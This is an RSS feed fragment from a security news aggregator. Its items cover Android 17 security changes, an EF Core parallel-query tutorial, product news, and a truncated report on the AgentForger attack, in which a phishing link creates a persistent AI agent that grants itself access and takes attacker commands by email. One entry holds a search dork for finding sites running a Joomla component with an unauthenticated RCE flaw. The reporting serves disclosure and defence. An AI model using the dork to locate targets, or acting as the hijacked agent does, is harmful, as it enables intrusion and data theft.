}</code></pre>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/s1267/Eyedropper%20Tester.webp"><img border="0" data-original-height="713" data-original-width="1267" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/w640-h360/Eyedropper%20Tester.webp" width="640"></a></div><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><br></h3><h3><span><span face="Arial, sans-serif"><i>Picking a color from anywhere on the screen with the system EyeDropper</i></span></span></h3><h2>Local network access</h2>
<p>Apps targeting Android 17 now either require the <code><a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network">ACCESS_LOCAL_NETWORK</a></code> runtime permission or the use of system-mediated, privacy-preserving device pickers for local network communication, such as talking to smart home devices or casting receivers. Because <code>ACCESS_LOCAL_NETWORK</code>  falls under the existing <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permission group, users who have already granted other <code><a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES">NEARBY_DEVICES</a></code> permissions will not be prompted again. </p>

<h2>SMS OTP protection</h2>
<p>Android 17 expands SMS one-time-password (OTP) protection by delaying access to SMS messages for three hours:</p>
<ul>
  <li>WebOTP Format: <a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps">Delayed for all apps that are not the intended recipient (domain mismatch)</a>.</li>
  <li>Standard SMS OTP: <a href="https://developer.android.com/about/versions/17/behavior-changes-17#sms-otp-protection">Delayed for all apps targeting SDK 37+</a>.</li>
  <li>Exemptions: Default SMS, assistant, and connected companion apps are exempt. Apps are strongly encouraged to migrate to the <a href="https://developer.android.com/identity/sms-retriever">SMS Retriever</a> or <a href="https://developers.google.com/identity/sms-retriever/user-consent/overview">SMS User Consent APIs</a>.</li>
</ul>

<h2>Post-Quantum Cryptography (PQC)</h2>
<p>Android 17 is ready for the next generation of cryptographic security:</p>
<ul>
  <li>Keystore Integration: Supported devices can generate ML-DSA (Module-Lattice-Based Digital Signature Algorithm) keys in secure hardware to produce quantum-safe signatures, exposed via standard JCA APIs.</li>
  <li>Hybrid APK Signing: Introducing the v3.2 APK Signature Scheme, which combines classical signatures with ML-DSA signatures to secure app delivery.</li>
</ul>

<h2>Safer native dynamic code loading </h2>
If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14</a> for DEX and JAR files now extends to native libraries. All native files loaded using System.load must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError

<h2>Smarter password protection for physical inputs</h2>
<p>With Android 17, we're making it safer to enter passwords, PINs, and other secrets when using a physical keyboard by no longer showing the last typed character by default.</p>
<p>Users can still easily customize these display settings to match their preferences (availability may vary by device manufacturer).</p>
<p>These enhanced privacy protections are automatically supported byAndroid's built-in SDK components and will be supported in Compose 1.12 for SecureTextFields. </p>

<h3><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s798/Hide%20First%20Letter.gif"><img border="0" data-original-height="449" data-original-width="798" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFjWXyRLybiLVAIrIm1_60XHXhPmpB1QEph7AuqsGHs-NihIDRFbUgBh32gUKxo30173W-RpEInX9hmYFVnW5V8ZqtM3n_CzxlT0B0PVQr0LSOuOi7x2kZgN_jHRRlYJ7bYInZllvUGNoA_SrXkNi5wwHvUghUcnl0Gsgx_-ts4QEHq_KdbEYgWCg92xA/s16000/Hide%20First%20Letter.gif"></a></div></h3><h3><br></h3><h3><br></h3><h3><br></h3><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><div><br></div><i><div><i>Smarter password protection for physical inputs</i></div></i><div><br></div><h2>Media and camera features that empower creators and delight users
</h2><p>Android 17 introduces new <a href="https://blog.google/products-and-platforms/platforms/android/android-17-creator-features/">creator features</a> that give access to pro-quality cameras and media, all while improving the experience for consumers.</p>

<ul>
  <li><a href="https://developer.android.com/media/platform/integrate-eclipsa-video">Eclipsa Video</a>: HDR video standard built upon the <a href="https://github.com/SMPTE/st2094-50">SMPTE ST 2094-50 specification</a> that introduces new metadata to help devices adapt content for their display headroom and ambient light conditions, as well as improve the simultaneous display of standard and HDR content.</li>
  <li>RAW14 image format: New support for the <a href="https://developer.android.com/reference/kotlin/android/graphics/ImageFormat#raw14">RAW14 image format</a> provides a way for your professional camera app to capture the highest level of detail and color depth from compatible camera sensors.</li>
  <li>Vendor-defined camera extensions: Vendor-defined extensions enable hardware partners to define and implement custom camera extension modes, providing access to the best and latest camera features.</li>
  <li>Extended HE-AAC software encoder: A new system-provided Extended HE-AAC software encoder, supports both low and high bitrates using unified speech and audio coding, providing significantly better audio quality for voice messages in low-bandwidth conditions, including support for loudness metadata.</li>
  <li><a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">Versatile Video Coding (H.266)</a>:  Enables OEMs to add codec support by defining the <a href="https://developer.android.com/guide/topics/media/media-formats#video-formats">video/vvc</a> MIME type in <a href="https://developer.android.com/reference/android/media/MediaFormat"><code>MediaFormat</code></a>, adding new VVC profiles in <a href="https://developer.android.com/reference/android/media/MediaCodecInfo"><code>MediaCodecInfo</code></a>, and integrating support into <a href="https://developer.android.com/reference/android/media/MediaExtractor"><code>MediaExtractor</code></a>.</li>
  <li>Camera device type: New APIs that query the underlying device type to identify if a camera is built-in hardware, an external USB webcam, or a virtual camera.</li>
  <li>Constant Quality for Video Recording: <a href="https://developer.android.com/reference/android/media/MediaRecorder#setVideoEncodingQuality(int)"><code>SetVideoEncodingQuality</code></a> in <a href="https://developer.android.com/reference/android/media/MediaRecorder"><code>MediaRecorder</code></a> configures a constant quality (CQ) mode for video encoders to ensure uniform visual fidelity across the entire video.</li>
</ul>

<h2>Better support for hearing aids</h2>
<ul>
  <li>Bluetooth LE Audio hearing aid support: Android now includes a specific device category for Bluetooth Low Energy (BLE) Audio hearing aids with the new <a href="https://developer.android.com/reference/android/media/AudioDeviceInfo#TYPE_BLE_HEARING_AID"><code>AudioDeviceInfo.TYPE_BLE_HEARING_AID</code></a> constant, so your app can distinguish hearing aids from regular headsets to provide a tailored experience for users with assistive listening devices.</li>
  <li>Granular audio routing for hearing aids: Android 17 allows users to independently manage where specific system sounds are played. They can choose to route notifications, ringtones, and alarms to connected hearing aids or the device's built-in speaker, helping to avoid unwanted in-ear interruptions while maintaining a Bluetooth connection for hearing aid management apps.</li>
</ul>

<h2>CameraX and  Media3</h2>
<p><a href="https://developer.android.com/jetpack/androidx/releases/camerax">CameraX</a> and <a href="https://developer.android.com/jetpack/androidx/releases/media3">Media3</a> have been updated for Android 17. They are there to do the heavy lifting, smoothing the rough edges of media development and simplifying building reliable camera capture,  smooth media playback, and creative and complex editing experiences. </p>

<p>We've released an <a href="https://github.com/android/skills/tree/main/camera">agent skill</a> that can migrate legacy Android camera implementations (Camera1 or raw Camera2 APIs) to CameraX.</p>
  
<p>Note: You'll need to update your CameraX version to either 1.5.2 or 1.6.0+ to avoid a crash related to an added dynamic range mode on Android 17 devices.</p>

<h3>Get your apps, libraries, tools, and game engines ready!</h3>
<p>If you develop an Android SDK, library, tool, or game engine, it's critical to prepare any necessary updates now to prevent your downstream app and game developers from being blocked by compatibility issues and allow them to target the latest SDK features. Please let your downstream developers know if updates are needed to fully support Android 17.</p>

<p>Testing involves installing your production app or a test app making use of your library or engine using Google Play or other means onto a device or emulator running Android 17 Beta 4. Work through all your app's flows and look for functional or UI issues. Each release of Android contains platform changes that improve privacy, security, and overall user experience; review the app impacting behavior changes for apps <a href="https://developer.android.com/about/versions/17/behavior-changes-all">running on</a> and <a href="https://developer.android.com/about/versions/17/behavior-changes-17">targeting</a> Android 17 to focus your testing, including the following:</p>
<ul>
  <li>Resizability on large screens: Once you target Android 17 (SDK 37), you can no longer opt out of maintaining orientation, resizability and aspect ratio constraints <a href="https://developer.android.com/about/versions/17/changes/ff-restrictions-ignored">on large screens</a>.</li>
  <li>Dynamic code loading: If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection <a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading">introduced in Android 14 </a>for DEX and JAR files now extends to native libraries. All native files loaded using System.load() must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError.</li>
  <li>Enable CT by default: <a href="https://developer.android.com/privacy-and-security/security-config#CertificateTransparencySummary">Certificate transparency (CT)</a> is enabled by default. (On Android 16, CT is available but apps had to <a href="https://developer.android.com/privacy-and-security/security-config#certificateTransparency">opt in</a>.)</li>
  <li>Local network protections: Apps targeting SDK 37 or higher have <a href="https://developer.android.com/privacy-and-security/local-network-permission#android-17-enforcement">local network access blocked by default</a>. Switch to using privacy preserving pickers if possible, and use the new <a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"><b><code>ACCESS_LOCAL_NETWORK</code></b>permission for broad, persistent access.</a></li>
  <li>Background audio hardening: Starting in Android 17, the audio framework enforces <a href="https://developer.android.com/about/versions/17/changes/bg-audio">restrictions on background audio interactions</a> including audio playback, <a href="https://developer.android.com/media/optimize/audio-focus">audio focus</a> requests, and <a href="https://developer.android.com/reference/android/media/AudioManager#adjustStreamVolume(int,%20int,%20int)">volume change</a> APIs. Based on your feedback, we’ve made some changes since beta 2, including targetSDK gating while-in-use FGS enforcement and exempting alarm audio. Full details available in the <a href="https://developer.android.com/about/versions/17/changes/bg-audio">updated guidance</a>.</li>
  <li>NPU access declaration: Apps targeting Android 17 that need to directly access the NPU must declare <a href="https://developer.android.com/reference/kotlin/android/content/pm/PackageManager#feature_neural_processing_unit">FEATURE_NEURAL_PROCESSING_UNIT</a> in their manifest to avoid being blocked from accessing the NPU. This includes apps that use the <a href="https://ai.google.dev/edge/litert/next/npu">LiteRT NPU delegate</a>, vendor-specific SDKs, as well as the deprecated <a href="https://developer.android.com/ndk/guides/neuralnetworks">NNAPI</a>.</li>
</ul>

<h3>Get started with Android 17</h3>
<p>Your Pixel device should get Android 17 shortly if you haven't already been on the Android Beta. If you don’t have a Pixel device, you can <a href="https://developer.android.com/about/versions/17/get#on_emulator">use the 64-bit system images with the Android Emulator</a> in Android Studio. If you are currently on Android 17 Beta 4.1 and have not yet taken an Android 17 QPR1 beta, you can opt out of the program and you will then be offered the release version of Android 17 over the air.</p>
<h3>Getting the Android 17 beta on partner devices</h3>
<p>Android 17 is available in beta on handset, tablet, and foldable form factors <a href="https://developer.android.com/about/versions/17/devices">from partners</a> including Honor, iQOO, Lenovo, OnePlus, OPPO, Realme, Sharp, vivo, and Xiaomi.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s1653/android-17-beta-partners.jpg"><img border="0" data-original-height="624" data-original-width="1653" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy5cwRcpdR2j-1KMzQPpsxvIODRLlVkaFNQEIQoNaPQa4X4rgEna5imminlwFdcSJ3xihXdUSFouOC0-ZKyK1A53cBmoaU03au-FjfsqkPXm0tPLtOaWT_7z8tqnMmQjFOr-YIKeP3BMVq8Hmd7yH0zllW1aFMuiW6AAAcDUVL7aIyCAIZUs0d_0VMdF4/s16000/android-17-beta-partners.jpg"></a></div><br><h3><br></h3>

<p>For the best development experience with Android 17, we recommend that you use the latest Canary build of <a href="https://developer.android.com/studio/preview">Android Studio Quail</a>. Once you’re set up, here are some of the things you should do:</p>
<p>Test your current app for compatibility, learn whether your app is <a href="https://developer.android.com/about/versions/17/behavior-changes-all">affected by changes in Android 17</a>, and install your app onto a device or <a href="https://developer.android.com/studio/run/emulator">Android Emulator</a> running Android 17 and extensively test it.</p>

<p>Thank you again to everyone who participated in our Android developer preview and beta program. We're looking forward to seeing how your apps take advantage of the updates in Android 17, and have plans to bring you updates in a fast-paced release cadence going forward.</p>
<p>For complete information on Android 17 please visit the <a href="https://developer.android.com/about/versions/17">Android 17 developer site</a>.</p><br><br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Joomla Page Builder CK < = 3.5.10 - Unauthenticated Arbitrary File Upload (RCE)]]></title>
<description><![CDATA[inurl:com_pagebuilderck OR "/components/com_pagebuilderck/assets/pagebuilderck.js"]]></description>
<link>https://tsecurity.de/de/3693345/sicherheitsluecken/joomla-page-builder-ck-3510-unauthenticated-arbitrary-file-upload-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693345/sicherheitsluecken/joomla-page-builder-ck-3510-unauthenticated-arbitrary-file-upload-rce/</guid>
<pubDate>Sat, 25 Jul 2026 08:46:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[inurl:com_pagebuilderck OR "/components/com_pagebuilderck/assets/pagebuilderck.js"]]></content:encoded>
</item>
<item>
<title><![CDATA[KnowBe4’s Unveils Custom AI Video Builder]]></title>
<description><![CDATA[KnowBe4, the global leader in digital workforce security, securing both AI agents and humans, today announced the launch of Custom AI Video Builder, a new capability that lets security admins create custom, AI-generated training videos and deploy them directly into…
Read more →
The post KnowBe4’s...]]></description>
<link>https://tsecurity.de/de/3691619/it-security-nachrichten/knowbe4s-unveils-custom-ai-video-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691619/it-security-nachrichten/knowbe4s-unveils-custom-ai-video-builder/</guid>
<pubDate>Fri, 24 Jul 2026 15:10:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>KnowBe4, the global leader in digital workforce security, securing both AI agents and humans, today announced the launch of Custom AI Video Builder, a new capability that lets security admins create custom, AI-generated training videos and deploy them directly into…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/knowbe4s-unveils-custom-ai-video-builder/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/knowbe4s-unveils-custom-ai-video-builder/">KnowBe4’s Unveils Custom AI Video Builder</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KnowBe4’s Unveils Custom AI Video Builder]]></title>
<description><![CDATA[KnowBe4, the global leader in digital workforce security, securing both AI agents and humans, today announced the launch of Custom AI Video Builder, a new capability that lets security admins create custom, AI-generated training videos and deploy them directly into their security awareness traini...]]></description>
<link>https://tsecurity.de/de/3691570/it-security-nachrichten/knowbe4s-unveils-custom-ai-video-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691570/it-security-nachrichten/knowbe4s-unveils-custom-ai-video-builder/</guid>
<pubDate>Fri, 24 Jul 2026 14:58:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>KnowBe4, the global leader in digital workforce security, securing both AI agents and humans, today announced the launch of Custom AI Video Builder, a new capability that lets security admins create custom, AI-generated training videos and deploy them directly into their security awareness training (SAT) programs in minutes. The innovation is the latest addition to […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/24/knowbe4s-unveils-custom-ai-video-builder/">KnowBe4’s Unveils Custom AI Video Builder</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Experts warn ChatGPT's Workspace Agent Builder can be hijacked to create malicious AI workers]]></title>
<description><![CDATA[A single phishing link could have spelled disaster, thanks to a flaw in ChatGPT's Agent Builder.]]></description>
<link>https://tsecurity.de/de/3691518/it-nachrichten/experts-warn-chatgpts-workspace-agent-builder-can-be-hijacked-to-create-malicious-ai-workers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691518/it-nachrichten/experts-warn-chatgpts-workspace-agent-builder-can-be-hijacked-to-create-malicious-ai-workers/</guid>
<pubDate>Fri, 24 Jul 2026 14:19:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A single phishing link could have spelled disaster, thanks to a flaw in ChatGPT's Agent Builder.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AgentForger proves AI agents can become persistent insider threats]]></title>
<description><![CDATA[A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.



Its researchers have discovered AgentForger, a phishing-based attack that silently creates and launches a fully autonomous AI a...]]></description>
<link>https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</guid>
<pubDate>Fri, 24 Jul 2026 02:32:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.</p>



<p class="wp-block-paragraph">Its researchers have discovered <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">AgentForger</a>, a phishing-based attack that silently creates and launches a fully autonomous AI agent within OpenAI workspaces.</p>



<p class="wp-block-paragraph">Once running, the agent has full access to apps like Outlook, Slack, SharePoint, and Google Drive. It is configured to operate indefinitely without further user interaction, can approve its own access by toggling “never ask” settings, and can continue to act on new assignments sent via email by the attackers that control it. Broad, unfettered access to systems allows it to perform reconnaissance, harvest sensitive data and credentials, impersonate victims, and launch phishing campaigns.</p>



<p class="wp-block-paragraph">While OpenAI resolved the vulnerability four days after disclosure, on a larger scale, AgentForger sheds light on what can happen when <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank">AI agents go rogue</a>.</p>



<p class="wp-block-paragraph">“We’re moving into a world where software doesn’t just help people work. It works alongside them,” said <a href="https://zenity.io/authors/michael-bargury" target="_blank" rel="noreferrer noopener">Michael Bargury</a>, co-founder and CTO of agentic AI security platform Zenity. “As AI agents become more capable, attackers will naturally look for ways to influence them, just as they’ve always looked for ways to influence people.”</p>



<h2 class="wp-block-heading">A ‘persistent operator’ that acts without approval</h2>



